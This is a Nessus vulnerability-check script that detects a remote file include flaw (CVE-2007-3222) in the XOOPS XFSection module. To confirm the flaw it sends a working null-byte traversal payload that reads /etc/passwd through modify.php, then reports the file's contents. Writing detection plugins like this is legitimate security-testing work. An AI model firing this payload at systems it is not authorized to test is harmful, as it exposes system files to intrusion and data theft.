#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is affected by a
remote file include vulnerability. 

Description :

The remote host is running XFSection, a third-party module for Xoops. 

The version of this module installed on the remote host fails to
sanitize input to the 'dir_module' parameter of the 'modify.php'
script before using it to include PHP code.  Regardless of PHP's
'register_globals' setting, an unauthenticated attacker can exploit
this issue to view arbitrary files on the remote host or possibly to
execute arbitrary PHP code, perhaps from third-party hosts. 

See also :

http://www.milw0rm.com/exploits/4068

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(25493);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-3222");
  script_bugtraq_id(24465);
  script_xref(name:"OSVDB", value:"36815");

  script_name(english:"XOOPS XFSection Module dir_module Parameter Remote File Include Vulnerability");
  script_summary(english:"Tries to read a local file with XFSection's modify.php");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("xoops_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/xoops"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Try to exploit the flaw to read a file.
  #
  # nb: the exploit requires magic_quotes_gpc to be disabled; if it's
  #     not, allow_url_fopen might still allow an attack to work but
  #     we can't test for it without accessing a remote site.
  file = "/etc/passwd";
  req = http_get(
    item:string(
      dir, "/modules/xfsection/modify.php?",
      "dir_module=", file, "%00"
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if there's an entry for root.
  if (egrep(pattern:"root:.*:0:[01]:", string:res))
  {
    contents = res;
    contents = contents - strstr(contents, "<html>");

    if (contents)
    {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Here are the contents of the file '/etc/passwd' that Nessus was\n",
        "able to read from the remote host :\n",
        "\n",
        contents
      );
    }
    else report = desc;

    security_hole(port:port, data:report);
    exit(0);
  }
}
